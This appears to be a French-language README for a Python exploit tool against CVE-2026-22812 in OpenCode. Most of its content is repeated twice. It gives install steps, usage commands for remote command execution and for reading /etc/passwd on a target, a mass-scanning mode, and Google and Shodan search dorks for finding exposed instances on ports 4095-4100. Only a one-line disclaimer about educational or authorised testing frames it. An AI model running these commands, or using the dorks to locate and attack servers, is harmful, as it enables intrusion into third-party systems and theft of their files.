
Outil Python pour vérifier et exploiter la CVE-2026-22812 dans OpenCode, prenant en charge l'exécution de commandes, la lecture de fichiers et l'analyse multi-cibles sur les ports 4095-4100.
OpenCode CVE-2026-22812 Exploiter Outils Python simples pour vérifier et exploiter la vulnérabilité OpenCode (CVE-2026-22812).
Installation
git clone https://github.com/CayberMods/CVE-2026-22812-POC.git
cd CVE-2026-22812-POC
pip install requests urllib3 argparse concurrent-log-handler colorama
Utilisation de base
# Vérifier une cible unique
python rce.py -u http://target:4096 --check
# Exécuter une commande
python rce.py -u http://target:4096 -c "whoami"
# Lire un fichier
python rce.py -u http://target:4096 --read-file /etc/passwd
# Scanner plusieurs cibles
python rce.py -l targets.txt --check
# Autres
python rce.py --help
Dorks de recherche
Google : intitle:"OpenCode" "Login"
Shodan : port:"4095-4100" http.component:"OpenCode"
Ports par défaut : 4095-4100
Outils Python simples pour vérifier et exploiter la vulnérabilité OpenCode (CVE-2026-22812).
Installation :
git clone https://github.com/CayberMods/CVE-2026-22812-POC.git
cd CVE-2026-22812-POC
pip install requests urllib3 argparse concurrent-log-handler colorama
Utilisation de base
# Vérifier une cible unique
python rce.py -u http://target:4096 --check
# Exécuter une commande
python rce.py -u http://target:4096 -c "whoami"
# Lire un fichier
python rce.py -u http://target:4096 --read-file /etc/passwd
# Scanner plusieurs cibles
python rce.py -l targets.txt --check
# Autres
Dorks de recherche :
Google : intitle:"OpenCode" "Login"
Shodan : port:"4095-4100" http.component:"OpenCode"
Ports par défaut : 4095-4100
Note Uniquement pour tests éducatifs/autorités.